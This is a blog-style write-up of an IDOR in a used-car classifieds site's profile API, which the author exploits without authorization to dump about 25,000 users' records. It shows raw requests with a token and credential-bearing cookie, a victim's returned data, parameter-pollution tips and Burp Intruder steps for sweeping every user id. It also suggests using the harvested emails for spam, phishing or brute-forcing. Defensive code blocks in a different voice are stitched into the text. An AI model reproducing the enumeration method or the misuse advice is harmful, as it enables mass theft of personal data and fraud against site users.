IDOR on a used-car site: stealing a database of 25,000 users

I came across a classified-ads site that sells used cars (let's leave it unnamed, so as not to damage the resource's reputation) and decided to test it for vulnerabilities. I found a few non-critical ones and one critical one.

The critical one is an IDOR in the personal account, in the function for editing personal data. A gross error: the account id is passed in the POST request.

POST /api/user/saveUserInfo HTTP/1.1
Host: www.****.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: eyJhbGffOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHBpcmUiOiIyMDE3LTAzLTEyIDE0OjMxOjI1IiwiZW1haWwiOiJxaWVjghpAZ21haWwuY29tIn0.RtQI9h5O16ZS48LuK6rwJXlc1MCNmY8ai5rMywLeEe8
Content-Type: application/json;charset=utf-8
Content-Length: 1590
Cookie: django_language=ru; utm_source=; utm_campaign=red_301; utm_medium=offline; _ga=GA1.2.1196308855.1481541724; _edata="eyJ1c2VybmFtZSI6InFpZWNlekBnbWFpbC5jb20iLCJwYXNzd29yZCI6InF3ZXJ0eXoxIn0:1cGPlN:i5Sse_VzW0Jtu3tltK3iHCBLYuI"
Connection: close

{"id":59553,"user":{"id":59541,"email":"","is_staff":false,"date_joined":"2016-12-12T12:20:18.444255Z"},"uuid":"9b921350-5dce-4796-bdcc-ad11039a18d8","email":"","state":{"id":59553,"state_data":{"state":"active","state_title":"Активный","state_date":"2016-12-12T12:30:39.513Z","state_val":true,"state_extra":{}},"created_extra":{},"confirmed_extra":{},"active_extra":{},"blocked_extra":{},"deleted_extra":{},"last_modified":"2016-12-12T12:30:39.514128Z","extra":"{}","created":true,"created_date":"2016-12-12T12:20:18.474992Z","confirmed":true,"confirmed_date":"2016-12-12T12:30:39.480891Z","active":true,"active_date":"2016-12-12T12:30:39.513982Z","blocked":false,"blocked_date":null,"deleted":false,"deleted_date":null},"allowed_regions":[],"info":{"request_source_region":null,"request_type":1,"confirmation_code_mail":null,"confirmation_code_sms":null,"request_allowed_regions":null},"images":{},"is_analyst":false,"is_mp_moderator":false,"is_mp_manager":false,"is_mp_dealer_manager":false,"is_mp_supervisor":false,"source_region":8,"source_region_info":{"id":8,"administrative_area":"Khmel'nyts'ka oblast","administrative_area_auto_ria":"Хмельницк","ru_name":"Хмельницкая область","uk_name":"Хмельницька область","slug":"","region":15},"phone":"111","first_name":"ww","last_name":"ww","buyer_type":1,"rating":3,"additional_info":null,"authorized":false,"email_notification":true,"sms_notification":true,"inspect_regions":[],"inspect_code":null,"amount":0,"personal_manager":223,"supervisor":51}

Changing the nested "id":59541 trips the protection: 403. Substituting a different value for the outer "id":59553 instead returns the email address, location and name of any user whose id is lower than mine; it does not change that user's data, it simply hands the data to me. If the data had been changed as well it would have been even more critical: we could have changed the email address on every account and broken them all.
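To make the defect concrete, here is an added example (not the site's code) of a profile-update handler in the vulnerable shape the post describes, where the "id" field of the JSON body decides which record is read, next to a hardened shape where the server-side session decides. `Session`, `USERS`, `Forbidden`, `EDITABLE` and the field values are constructed for this example; the vulnerable handler also applies the edits, which is the "more critical" variant the post mentions rather than what it observed.

```python
# Added example, not the site's code: vulnerable vs hardened saveUserInfo.
import json
from copy import deepcopy
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised (HTTP 403 in a real app) when the caller may not touch the record."""


@dataclass(frozen=True)
class Session:
    """What the Authorization token resolved to on the server side (assumed)."""
    user_id: int


# Constructed stand-in for the user table; ids are sequential like the site's.
USERS = {
    59541: {"id": 59541, "email": "alice@example.invalid", "first_name": "A", "source_region": 8},
    59530: {"id": 59530, "email": "bob@example.invalid", "first_name": "B", "source_region": 26},
}
EDITABLE = ("first_name", "source_region")   # email deliberately not editable


def fresh_users() -> dict:
    """A private copy of USERS so each call sequence starts from the same state."""
    return deepcopy(USERS)


def save_user_info_vulnerable(users: dict, session: Session, body: str) -> dict:
    """Vulnerable: the body's "id" decides which record is read and written.
    The post observed the read half (another user's email, name and region
    came back); the write half is the "more critical" variant it mentions."""
    data = json.loads(body)
    record = users.get(int(data["id"]))          # trusts the client-supplied id
    if record is None:
        raise KeyError("no such user")
    for key in EDITABLE:
        if key in data:
            record[key] = data[key]
    return dict(record)                          # echoes the victim's data


def save_user_info_hardened(users: dict, session: Session, body: str) -> dict:
    """Hardened: the session decides the record. A body "id" that disagrees
    with the session is rejected rather than ignored, so tampering shows up
    in the logs instead of silently succeeding or silently being dropped."""
    data = json.loads(body)
    if "id" in data and int(data["id"]) != session.user_id:
        raise Forbidden("body id does not match the authenticated user")
    record = users[session.user_id]              # authorization by ownership
    for key in EDITABLE:
        if key in data:
            record[key] = data[key]
    return dict(record)
```

The hardened version never looks the record up by a client-supplied identifier at all; the explicit mismatch check exists only so that a tampered request is logged as a 403 rather than quietly treated as a self-edit.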

There are various ways of bypassing IDOR protection; the main one is:

HTTP Parameter Pollution is a relatively new kind of attack on web applications whose main advantage is the ability to bypass a WAF (Web Application Firewall). The concept of HPP was developed by the Italian researchers Luca Carettoni and Stefano di Paola and presented at the OWASP AppSec EU09 conference in Poland. (quoted from a Russian website)

When, for example, a GET or POST request contains repeated variables, we can apply HTTP Parameter Pollution to bypass the IDOR protection. Attention! During testing you will often see a 403 error and conclude that, for example, an article cannot be edited via IDOR, but when you open that article you will see that it has in fact changed. The response does not have to be 200. It is also important to understand that, depending on how the request is sent, HPP cannot always be applied.
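The reason repeated parameters matter is that different parsing styles read a repeated key differently, so an authorization check and the data access behind it can disagree about which value was sent. The added example below (not from the post; function names are constructed, the parsing behaviour is that of Python's standard urllib.parse) shows the two lenient readings side by side and a strict parser that refuses repeated keys, which removes the condition HPP depends on.

```python
# Added example, not from the post: lenient vs strict query-parameter parsing.
from urllib.parse import parse_qs, parse_qsl


def last_wins(query: str) -> dict:
    """dict(parse_qsl(...)) silently keeps the LAST value of a repeated key."""
    return dict(parse_qsl(query, keep_blank_values=True))


def first_wins(query: str) -> dict:
    """parse_qs keeps every value as a list; taking [0] yields the FIRST one."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def parsers_disagree(query: str) -> bool:
    """True when the two lenient readings of the same query string differ."""
    return last_wins(query) != first_wins(query)


def strict_params(query: str) -> dict:
    """Reject any repeated key so every layer of the app sees the same value.
    With this in front of both the authorization check and the data access,
    a request carrying the same parameter twice is an error, not an ambiguity."""
    parsed = parse_qs(query, keep_blank_values=True)
    dupes = sorted(k for k, v in parsed.items() if len(v) > 1)
    if dupes:
        raise ValueError(f"duplicate parameters not allowed: {dupes}")
    return {k: v[0] for k, v in parsed.items()}
```

A framework usually settles on one of the two lenient readings; the defensive point is that all code paths touching the same parameter must use the same reading, and rejecting repeats outright is the simplest way to guarantee that.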


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Dec 2016 11:44:34 GMT
Content-Type: application/json
Connection: close
Vary: Accept-Encoding
Content-Language: ru
Vary: Accept, Cookie, Accept-Language
Content-Length: 1568

{"id":59542,"user":{"id":59530,"email":"dimat_**","is_staff":false,"date_joined":"2016-12-12T11:32:25.950746Z"},"uuid":"8e8a0ae6-c587-4f44-8e74-e7583f4cdd2e","email":"dimat_**","state":{"id":59542,"state_data":{"state":"active","state_title":"Активный","state_date":"2016-12-12T11:34:51.070Z","state_val":true,"state_extra":{}},"created_extra":{},"confirmed_extra":{},"active_extra":{},"blocked_extra":{},"deleted_extra":{},"last_modified":"2016-12-12T11:34:51.070647Z","extra":"{}","created":true,"created_date":"2016-12-12T11:32:25.978469Z","confirmed":true,"confirmed_date":"2016-12-12T11:34:51.024676Z","active":true,"active_date":"2016-12-12T11:34:51.070421Z","blocked":false,"blocked_date":null,"deleted":false,"deleted_date":null},"allowed_regions":[],"info":{"request_source_region":null,"confirmation_code_sms":null,"request_allowed_regions":null,"confirmation_code_mail":null,"request_type":1},"images":{},"is_analyst":false,"is_mp_moderator":false,"is_mp_manager":false,"is_mp_dealer_manager":false,"is_mp_supervisor":false,"source_region":26,"source_region_info":{"id":26,"administrative_area":"Kyivs'ka oblast","administrative_area_auto_ria":"Киев","ru_name":"Киевская область","uk_name":"Київська область","slug":"","region":1},"phone":"**","first_name":"**","last_name":"**","buyer_type":1,"rating":3,"additional_info":null,"authorized":false,"email_notification":true,"sms_notification":true,"inspect_regions":[],"inspect_code":null,"amount":0,"personal_manager":223,"supervisor":51}

So we have found an IDOR and could go and report the vulnerability.

But many companies do not appreciate the danger: they quietly fix the vulnerability and then argue that it was never dangerous.

Therefore we will exploit this IDOR further.

Usually, after finding an IDOR, one tries a few identifier values by hand and then writes the vulnerability report.

But nobody tries to "spin" it any further.

In this article I want to show how, using an IDOR in the personal account, you can obtain the personal information of all the site's users, including administrators (I have never seen anyone write about this).

Our id is 59553; rounding up, we learn that the resource has about 60 thousand users.

Now we need a program that sends requests en masse and collects the responses: Burp Intruder (a licensed copy belonging to Lary_Lau). Send the request to Intruder (Ctrl+I), mark the number in the Positions tab, and in the Payloads tab choose numbers from 1 to 59,552. Start the attack.

Unfortunately, I only got through ids up to 25 thousand and could not do the rest: the administrators deleted my account, blocked my IP address and shut down the personal-information edit request (that was really fun :))
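The administrators noticed the sweep only after some 25,000 records had already been returned. A sweep like this has an obvious shape in the application's own logs, as one session touching thousands of other users' ids in a short time. The added example below (not from the post) is a small detector for that shape, run over a constructed audit log whose format is an assumption for this example: one request per line, "<iso-timestamp> <client-ip> <session-user-id> <body-id> <http-status>", where the session user comes from the Authorization token and the body id from the JSON.

```python
# Added example, not from the post: detecting cross-account id sweeps
# against a profile endpoint from a constructed application audit log.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window length
THRESHOLD = 20                   # distinct foreign ids in one window => alert


def build_sample_log() -> str:
    """Constructed log: two benign self-edits, one stray cross-account request,
    and one session walking ids 1..30 one per second (the sweep)."""
    lines = [
        "2016-12-12T12:30:39Z 198.51.100.7 59530 59530 200",
        "2016-12-12T12:31:02Z 198.51.100.7 59530 59530 200",
        "2016-12-12T12:35:10Z 198.51.100.8 59520 59519 403",
    ]
    start = datetime(2016, 12, 12, 12, 40, 5)
    for n in range(1, 31):
        ts = (start + timedelta(seconds=n)).strftime("%Y-%m-%dT%H:%M:%SZ")
        lines.append(f"{ts} 203.0.113.10 59553 {n} 200")
    return "\n".join(lines) + "\n"


SAMPLE_LOG = build_sample_log()


def parse_line(line: str) -> tuple:
    """Split one audit line into typed fields (format assumed, see above)."""
    ts, ip, session_user, body_id, status = line.split()
    return (datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip,
            int(session_user), int(body_id), int(status))


def find_enumerators(log_text: str, window=WINDOW, threshold=THRESHOLD) -> list:
    """Group cross-account requests by (ip, session user) and report any group
    that touches >= threshold distinct foreign ids inside one window.
    Status codes are ignored on purpose: the post notes that a 403 does not
    prove the action failed, and a successful sweep returns 200 anyway."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, session_user, body_id, _status = parse_line(line)
        if body_id != session_user:              # editing your own record is normal
            events[(ip, session_user)].append((ts, body_id))

    alerts = []
    for (ip, session_user), evs in events.items():
        evs.sort()
        best, best_start, start = 0, None, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1                       # slide the window forward
            distinct = {bid for _, bid in evs[start:end + 1]}
            if len(distinct) > best:
                best, best_start = len(distinct), evs[start][0]
        if best >= threshold:
            alerts.append({"ip": ip, "session_user": session_user,
                           "distinct_ids": best, "window_start": best_start})
    return alerts


if __name__ == "__main__":
    for alert in find_enumerators(SAMPLE_LOG):
        print(alert)
```

Counting distinct foreign ids per session rather than raw request volume keeps a user who edits their own profile repeatedly, or a single mistaken request, below the threshold while still catching a slow sweep as soon as it crosses it.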


Press the button to save the server responses and we get a file with 50 MB of data.

If you want, sort the data (keep only the email addresses for spam/phishing mailings or account brute-forcing) in Excel or a text editor.

But to prove the danger to the administration, 50 MB of responses should be enough. I write to the IT company that services the site:

qiece (December 13, 2016, 16:24): Hi, Sergey. Yesterday I discovered an insecure direct object reference vulnerability in the editing of data in the user's personal account …

qiece (December 13, 2016, 16:46): Can I send you the database to confirm it? When will I get a response?
Representative (December 13, 2016, 16:48): No, do not send the database.
Representative (December 13, 2016, 17:35): Max, two points:

1) I need to talk the matter over with the owner of the resource, and the periodicity:

2) your "testing", is it occasional or on a regular basis?

qiece (December 13, 2016, 18:44): on a regular basis

qiece (December 14): Good evening, Sergey. Have you discussed cooperation with the owner of the site???

qiece (December 15): ???
qiece (December 16, 2016, 12:10): At least tell me what the owner's response was. Is he still on his website?
Representative (December 16, 2016, 12:37): Maxim, good afternoon. The site owner is very interested in the safe operation of the site. He will make a decision shortly and I will know it.

qiece (December 20, 2016, 17:51): Good evening. When will you answer? Ignoring is not a solution to the security holes in the site and the compromised user database.

On December 14 the vulnerability was fixed: the id variable was removed from the POST request, and not even a thank-you was said. As for the database of 25,000 users that had been dumped, the company did not care: nobody told me to delete it and nobody offered an NDA.
Of course, after a few days of fruitless correspondence with the company I deleted the file with this database, because I do not want any trouble. Some black hat could have sold it on the darknet.
In this situation, do not blame the development company. Blame the owner, who does not think about the site's security and saves money on it. I hope that this project will grow and close its security holes.
Good luck in the search for vulnerabilities.
Subscribe on Twitter.